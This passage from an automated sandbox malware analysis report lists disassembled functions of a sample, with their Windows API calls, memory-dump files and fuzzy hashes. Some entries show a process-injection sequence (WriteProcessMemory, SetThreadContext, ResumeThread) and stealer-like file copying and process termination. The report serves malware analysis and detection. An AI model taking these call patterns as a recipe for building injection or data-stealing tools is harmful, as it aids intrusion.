                                      • Opcode Fuzzy Hash: 0af6430af0e890ea9ff340e93548a6331958b9d718ff419e7788a76b2ee21dd3
                                      • Instruction Fuzzy Hash: 4741CB70941209EFCB22EF18C894FF5B7B8FF18340F50495DE40687281EB70EA688B81
                                      Function 0030D181 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __lock.LIBCMT ref: 0030D18F
                                        • Part of subcall function 0030CD59: __mtinitlocknum.LIBCMT ref: 0030CD6F
                                        • Part of subcall function 0030CD59: __amsg_exit.LIBCMT ref: 0030CD7B
                                        • Part of subcall function 0030CD59: RtlEnterCriticalSection.NTDLL(00000000), ref: 0030CD83
                                      • RtlDecodePointer.NTDLL(00316E40), ref: 0030D1CB
                                      • RtlDecodePointer.NTDLL ref: 0030D1DC
                                        • Part of subcall function 0030D8C7: RtlEncodePointer.NTDLL(00000000), ref: 0030D8C9
                                      • RtlDecodePointer.NTDLL(-00000004), ref: 0030D202
                                      • RtlDecodePointer.NTDLL ref: 0030D215
                                      • RtlDecodePointer.NTDLL ref: 0030D21F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2005412495-0
                                      • Opcode ID: abeadbcaa73f78501afc26a0c180947a49f2cad133e7b8e17130a6b01cce6828
                                      • Instruction ID: f13c8d0ac19b69806c5f1fee023719e631a606d4c2476714e7f36dbd1c213392
                                      • Opcode Fuzzy Hash: abeadbcaa73f78501afc26a0c180947a49f2cad133e7b8e17130a6b01cce6828
                                      • Instruction Fuzzy Hash: 7B314870D02309DFDF52AFE8D96569CBBF8BF19310F10452AE410A62D1CBB48889DF24
                                      Function 0030E79C Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0030E7A8
                                        • Part of subcall function 0030DA31: __getptd_noexit.LIBCMT ref: 0030DA34
                                        • Part of subcall function 0030DA31: __amsg_exit.LIBCMT ref: 0030DA41
                                      • __amsg_exit.LIBCMT ref: 0030E7C8
                                      • __lock.LIBCMT ref: 0030E7D8
                                      • InterlockedDecrement.KERNEL32(?), ref: 0030E7F5
                                      • _free.LIBCMT ref: 0030E808
                                      • InterlockedIncrement.KERNEL32(00319F98), ref: 0030E820
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: c152896fdb37859b5cb98808ff8471613942f24679af749869cd7ed2dc8af774
                                      • Instruction ID: 797d1a57d885e4bd1cb3332da04e684f2fd0513077b3d6c37f4b2c741136925f
                                      • Opcode Fuzzy Hash: c152896fdb37859b5cb98808ff8471613942f24679af749869cd7ed2dc8af774
                                      • Instruction Fuzzy Hash: 7901DB35B03B11DBDB23ABA4982579D7774BF09F21F018916F8106B6D1C7349881CBD2
                                      Function 00305D00 Relevance: 8.9, APIs: 7, Instructions: 107stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcat.KERNEL32(?,02F45420), ref: 00305D5B
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                      • lstrcat.KERNEL32(?,00000000), ref: 00305D7E
                                      • lstrcat.KERNEL32(?,?), ref: 00305D9A
                                      • lstrcat.KERNEL32(?,?), ref: 00305DAE
                                      • lstrcat.KERNEL32(?,02F389E0), ref: 00305DC1
                                      • lstrcat.KERNEL32(?,?), ref: 00305DD5
                                      • lstrcat.KERNEL32(?,02F45900), ref: 00305DE9
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300D10: GetFileAttributesA.KERNEL32(00000000,?,?,002F1774,?,?,?,003101E9), ref: 00300D1D
                                        • Part of subcall function 00305A70: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00305A82
                                        • Part of subcall function 00305A70: RtlAllocateHeap.NTDLL(00000000), ref: 00305A89
                                        • Part of subcall function 00305A70: wsprintfA.USER32 ref: 00305AA2
                                        • Part of subcall function 00305A70: FindFirstFileA.KERNEL32(?,?), ref: 00305AB9
                                        • Part of subcall function 00305A70: StrCmpCA.SHLWAPI(?,003101DC), ref: 00305ADC
                                        • Part of subcall function 00305A70: StrCmpCA.SHLWAPI(?,003101D8), ref: 00305AF6
                                        • Part of subcall function 00305A70: wsprintfA.USER32 ref: 00305B18
                                        • Part of subcall function 00305A70: CopyFileA.KERNEL32(?,00000000,00000001), ref: 00305BBC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Heapwsprintf$AllocateAttributesCopyFindFirstFolderPathProcesslstrcpy
                                      • String ID:
                                      • API String ID: 987985321-0
                                      • Opcode ID: 7392a93af519d3f59d78410c6d043fa2f4c7845258d6d3759257ef66cd46787c
                                      • Instruction ID: 73e0c652b60dea6e97f04a10cc5812040940b45992feb88d105f99215b5393d2
                                      • Opcode Fuzzy Hash: 7392a93af519d3f59d78410c6d043fa2f4c7845258d6d3759257ef66cd46787c
                                      • Instruction Fuzzy Hash: 4B4164B191130C67DB29FBB0CD96EEA737C6F14700F0445A9B70A56191EB709689CFA1
                                      Function 002FD9C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD9DA
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F6F5
                                        • Part of subcall function 0030F6E0: __CxxThrowException@8.LIBCMT ref: 0030F70A
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F71B
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FDA17
                                        • Part of subcall function 0030F693: std::exception::exception.LIBCMT ref: 0030F6A8
                                        • Part of subcall function 0030F693: __CxxThrowException@8.LIBCMT ref: 0030F6BD
                                        • Part of subcall function 0030F693: std::exception::exception.LIBCMT ref: 0030F6CE
                                      • memcpy.MSVCRT(?,?,?), ref: 002FDA78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
                                      • String ID: invalid string position$string too long
                                      • API String ID: 85833692-4289949731
                                      • Opcode ID: 7f8c1e70a2c3bf6c6665d6985cd140065ce1aa6302a1a74297d138595fd32d04
                                      • Instruction ID: 2c1593e014130cd240a4d865c1fcd63525a9d8d4cc7bd44d2a329857290b32dc
                                      • Opcode Fuzzy Hash: 7f8c1e70a2c3bf6c6665d6985cd140065ce1aa6302a1a74297d138595fd32d04
                                      • Instruction Fuzzy Hash: E331F9333142185BD7219E5CE890B7AF39EDBA17A4F20053FF241CB291D672DC5087A5
                                      Function 002FEE88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52injectionthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 002FEEB7
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 002FEEE9
                                      • SetThreadContext.KERNEL32(?,?), ref: 002FEEFF
                                      • ResumeThread.KERNEL32(?), ref: 002FEF09
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MemoryProcessThreadWrite$ContextResume
                                      • String ID: (
                                      • API String ID: 2723624206-3887548279
                                      • Opcode ID: 9dfaca63c1c36a7f4e7b83b250af3d04767bca9a96d7ab84965033658285a514
                                      • Instruction ID: e94e1a95d5afc0b89bd45b2977ccda30e35044b6a210756a4ea60f3865f4ce6f
                                      • Opcode Fuzzy Hash: 9dfaca63c1c36a7f4e7b83b250af3d04767bca9a96d7ab84965033658285a514
                                      • Instruction Fuzzy Hash: 1A114575A01209EFCB24CF58DC84FAAB7B9FF88325F108619EA1997250C734F955CB90
                                      Function 002F92D0 Relevance: 7.8, APIs: 5, Instructions: 295filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F93AA
                                      • lstrlen.KERNEL32(00000000), ref: 002F95A5
                                      • lstrlen.KERNEL32(00000000), ref: 002F95B9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F9374
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F962C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileProcesslstrlen$CopyHeaplstrcat$AllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                      • String ID:
                                      • API String ID: 1083493885-0
                                      • Opcode ID: 2d48446edc843fdc752f0f10f41fe6d0af15aaf4ed5dc6ae153946cbf03cd3b5
                                      • Instruction ID: 9eafc9cf331b5d3c575826808e9610b76b09e458790e5939e6eae2650392d330
                                      • Opcode Fuzzy Hash: 2d48446edc843fdc752f0f10f41fe6d0af15aaf4ed5dc6ae153946cbf03cd3b5
                                      • Instruction Fuzzy Hash: E0B1157192010D6BDB45FBB0DE66DFEB378AE54780F504138F60272291EF60AA68CF61
                                      Function 002F9690 Relevance: 7.8, APIs: 5, Instructions: 264fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F976A
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F9734
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
